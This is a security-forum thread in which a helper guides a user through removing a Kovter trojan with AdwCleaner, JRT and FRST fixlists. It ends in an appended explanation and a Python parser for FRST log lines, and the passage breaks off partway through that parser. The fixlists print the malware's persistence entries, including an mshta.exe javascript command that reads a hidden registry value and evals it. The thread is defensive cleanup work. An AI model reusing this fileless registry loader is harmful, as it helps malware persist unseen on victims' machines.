
Help resolving KOTVER issue


BammersTX

Hello,

 

My Norton keeps telling me I have this KOTVER trojan, and forces me to restart daily or more often.  Now it's saying I have to manually remove it, but their tool I downloaded will not run.  Hopefully this is SOSAD to you guys, and you can help me be rid of this.

 

Attached are the files you requested.  Note that I ended up with 2 scan logs from the Emsisoft scan, one more detailed than the other.  One was obtained from clicking the log menu at the top of the window, the other from a button at the bottom.  I have attached both.

 

Thanks in advance!

Addition.txt

FRST.txt

scan_161008-203354.txt

Scan_161008-203931.txt


Hello again.

 

If it's of any help, I believe I know how I got this trojan on my system.

 

After getting an "urgent update for firefox" notice, I had a moment of dumb and ran the stupid thing.

 

https://support.mozilla.org/en-US/questions/1127436

 

The file I ran is still in my downloads folder and is named firefox-patch.js

 

I am certain my Norton said the file was safe, and the window that opened was a pretty good ripoff of the firefox logo, etc

 

I feel so stupid, so so stupid.  I'm usually good about spotting this kind of thing, but they seem to be getting better at spoofing and fooling the AV suites.

 

Anyway, looking forward to your instructions...


Do the following:

Download AdwCleaner and save it on your desktop.

  • Close all open programs and Internet browsers (you may want to print out or write down these instructions first).
  • Double click on adwcleaner.exe to run the tool.
  • Click on the Scan button.
  • After the scan has finished, click on the Clean button.
  • Confirm each time with OK.
  • You will be prompted to restart your computer. A text file will open in Notepad after the restart (this is the log of what was removed), which you can save on your desktop.
  • Attach that log file to your reply by clicking the More Reply Options button to the lower-right of where you type in your reply.

    NOTE: If you lose that log file for any reason, you can find it at C:\AdwCleaner on your computer.

Download Junkware Removal Tool and save it on your desktop.
  • Run the tool by double-clicking it.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log is saved to your desktop and will automatically open.
  • Attach the JRT log file to a reply by clicking the More Reply Options button to the lower-right of where you type in your reply.
Copy the below code to Notepad; Save As fixlist.txt to your Desktop.
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\...\Run: [**ffejr<*>] => "C:\Users\scott\AppData\Local\24b7\b962.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\...\MountPoints2: {175ba64f-8a58-11e6-9daa-acd1b8cc1fe0} - "D:\LG_PC_Programs.exe" 
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00013986.tmp
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00010259.tmp
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00000163.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00032604.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00032251.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00032157.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031934.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031786.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031595.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031233.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00031066.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030748.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030589.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030328.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00030121.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00029999.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00028964.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00027823.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00027540.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00027505.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00026592.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00024871.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00023942.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00023297.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022795.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022573.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022168.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00022054.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021835.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021772.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021683.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021047.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00021005.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00020660.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00019468.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00019429.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00018748.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00018230.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00018047.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00017403.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00017315.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00016916.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00015264.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014778.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014268.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014262.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00014066.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00013945.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00013090.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00012698.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00012232.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00012147.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00011998.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010994.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010425.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010189.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00010002.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00009930.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00008443.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00008163.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00007991.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00007625.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00007224.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00006878.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00006669.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00006511.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00005491.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00005033.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00004222.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00004148.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00003678.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00003567.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00003098.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00001534.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00001027.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00000637.tmp
2016-10-01 05:16 - 2016-10-01 05:16 - 01340008 ____T C:\WINDOWS\SysWOW64\00000424.tmp
2016-09-28 19:37 - 2016-09-28 19:38 - 00006375 _____ C:\Users\scott\Downloads\firefox-patch.js
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00031452.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00030735.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00030116.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00028887.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00027627.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00027331.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00025687.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00023622.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00022846.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00022350.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00020472.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00016286.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00014265.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00012762.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00010053.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00009176.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00003410.tmp
2016-09-27 19:46 - 2016-09-27 19:46 - 01340008 ____T C:\WINDOWS\SysWOW64\00001732.tmp
2016-09-27 17:24 - 2016-10-08 20:42 - 00000000 ____D C:\Users\scott\AppData\Local\24b7
2016-09-27 17:24 - 2016-09-27 17:24 - 00000000 ____D C:\Users\scott\AppData\Roaming\5e98
2016-08-13 02:55 - 2016-08-13 02:55 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Task: {0E6680C4-65BD-4498-86A8-0291850EC248} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_ReadyToReboot -> No File <==== ATTENTION
Task: {6B4CD56A-E85E-4874-AC8F-74325E57A603} - \RtHDVBg_PushButton -> No File <==== ATTENTION
Task: {9567E270-199F-4972-89A3-D7F6816C5917} - \Microsoft\Windows\UpdateOrchestrator\Policy Install -> No File <==== ATTENTION
Task: {A708FFF0-B18B-435B-BAA9-26357B528D23} - \Adobe Flash Player Updater -> No File <==== ATTENTION
Task: {C53D54BC-1CF1-4819-8276-1694DADC49C1} - \Microsoft\Windows\UpdateOrchestrator\USO_UxBroker_Display -> No File <==== ATTENTION
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\Software\Classes\4bbd: "C:\WINDOWS\system32\mshta.exe" "javascript:VGxyit7O2="oW7mjI0";k65q=new ActiveXObject("WScript.Shell");qnE8yJ="43ElWcQ";HLv8n=k65q.RegRead("HKCU\\software\\nyzpteqr\\ydbfjly");LHiU1ie="mPz";eval(HLv8n);s97cOXT="RaUV4SKB";" <===== ATTENTION
C:\Users\scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0f7.lnk
C:\Users\scott\AppData\Local\24b7\b962.lnk
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.


Hi Kevin

 

Not exactly sure what you mean by "how things are running".  Generally, this machine seems a little snappier since running the original fix file, but still a little sluggish when on the interwebz.  The scan tools run fine.

 

NOTES

- EEK wants to quarantine a 'high risk' file, but I'm sure you can see that in the log.  As instructed, I did not quarantine it.

- Norton, now in addition to having me restart daily or more, gives me a pop up every 10 minutes or so saying it is blocking this KOTVER.  Oddly, I have not seen this pop up since I have been on this computer the last 45 minutes or so

- Previously, I saw a strange behavior in the folder C:\users\scott\appdata\local\24b7 where a file would just appear and disappear over and over.  I saw this even after the initial fix was run.  Oddly, this too is no longer happening.  I had noted before that the time/date stamps on all 3 files in this folder would update constantly, now they are all at 10/11/2016 3:11pm and not updating as before

 

Requested files are attached.


Addition.txt

FRST.txt

scan_161011-145835.txt


Some additional info concerning my Norton.  The message I'm getting now is a bit different than the last few days. It is now popping up with "Auto-Protect is processing threats" then another pop up indicating it has resolved the threat.

I've attached an activity log from Norton for your perusal.

 

EDIT - This is happening again ---> "I saw a strange behavior in the folder C:\users\scott\appdata\local\24b7 where a file would just appear and disappear over and over."  I went and checked when Norton again started telling me it is blocking this KOTVER

 

WTH????

Norton Resolved Security Risks.txt


Copy the below code to Notepad; Save As fixlist.txt to your Desktop.

HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\...\Run: [**ffejr<*>] => "C:\Users\scott\AppData\Local\24b7\b962.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8723.lnk [2016-10-11]
Startup: C:\Users\scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0f7.lnk [2016-10-11]
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00032608.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00031980.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00030872.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00027882.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00025323.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00019338.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00017763.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00015306.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00011347.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00010523.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00007393.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00006905.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00003766.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00002425.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00001861.tmp
2016-10-11 10:37 - 2016-10-11 10:37 - 01340008 ____T C:\WINDOWS\SysWOW64\00001040.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00032274.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00031286.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00031161.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00031142.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00030874.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00030835.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00030167.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00029564.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00029233.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028684.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028215.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028119.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028084.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00028078.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00027743.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00026762.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00026203.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00024436.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00024282.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00024098.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00023682.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00023461.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00023178.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00022869.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00022417.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00021601.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00020884.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00020491.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019897.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019747.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019640.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00019472.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018988.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018697.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018600.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00018429.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00017852.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00016583.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00016301.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00014313.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00013804.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00012433.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00012108.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011971.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011736.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011611.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00011349.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00010656.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00009277.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00008971.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00007613.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00007191.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00006503.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00006206.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00005298.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00005208.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00005075.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004949.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004500.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004359.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00004083.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00002989.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001992.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001896.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001462.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00001397.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000465.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000412.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000201.tmp
2016-10-11 10:36 - 2016-10-11 10:36 - 01340008 ____T C:\WINDOWS\SysWOW64\00000015.tmp
2016-10-10 20:42 - 2016-10-11 14:47 - 00000000 ____D C:\Users\scott\AppData\Local\24b7
2016-10-10 20:42 - 2016-10-10 20:42 - 00000000 ____D C:\Users\scott\AppData\Roaming\5e98
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\Software\Classes\4bbd: "C:\WINDOWS\system32\mshta.exe" "javascript:d9eQpl6s="c04";B8N=new ActiveXObject("WScript.Shell");g5la1bpU="BeTx37Jm";e2lg9o=B8N.RegRead("HKCU\\software\\nyzpteqr\\ydbfjly");we5ko="GmTd6g";eval(e2lg9o);T1PSqOsO="SE";" <===== ATTENTION
Close Notepad.

NOTE: It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST64 and press the Fix button just once and wait.

If the tool needed a restart please make sure you let the system restart normally and let the tool complete its run after restart.

The tool will make a log on the Desktop (Fixlog.txt). Attach it to your reply.

Note: If the tool warns you about an outdated version please download and run the updated version.

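Both fixlists above are built from the same kind of FRST (Farbar Recovery Scan Tool) lines, and the interesting part is the chain they describe: a Run value whose name contains non-printable characters pointing at a .lnk under AppData\Local, a .lnk in the Startup folder, and an HKCU\Software\Classes key whose command runs mshta.exe with a javascript: URL that RegRead()s a second registry value and eval()s it, alongside a burst of identical-size ____T temp files in SysWOW64. The following parser is an added example written for this page, not code from the thread, from the helper, or from FRST's authors. It runs over a constructed sample made of lines copied from the fixlists and reconstructs that chain. The key name 4bbd and the path nyzpteqr\ydbfjly are whatever this particular log showed, not fixed constants, and the .lnk-to-Classes-key hop (the .lnk opening a file whose extension is registered under that key) is stated from general Kovter behaviour, since the fixlists show both ends but not the intermediate file.

```python
r"""
Added example (not from the forum thread or from FRST): parse FRST log lines of
the kind quoted in the two fixlists and pull out the persistence indicators:

  Run value (non-printable name) -> .lnk in %LOCALAPPDATA%
  Startup folder .lnk
  HKCU\Software\Classes\<key> command -> mshta.exe "javascript:..." which
      RegRead()s a second registry value and eval()s it (payload lives in
      the registry, not on disk)
  many ____T *.tmp files of identical size under SysWOW64

SAMPLE_FRST is constructed from lines on this page. The key 4bbd and the
path nyzpteqr\ydbfjly are what this one log showed, not Kovter constants.
"""
import re
from collections import Counter

# Constructed sample input: representative lines copied from the fixlists above.
SAMPLE_FRST = r'''
HKU\S-1-5-21-3291325210-3541338845-3437875821-1002\...\Run: [**ffejr<*>] => "C:\Users\scott\AppData\Local\24b7\b962.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0f7.lnk [2016-10-11]
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00013986.tmp
2016-10-01 05:17 - 2016-10-01 05:17 - 01340008 ____T C:\WINDOWS\SysWOW64\00010259.tmp
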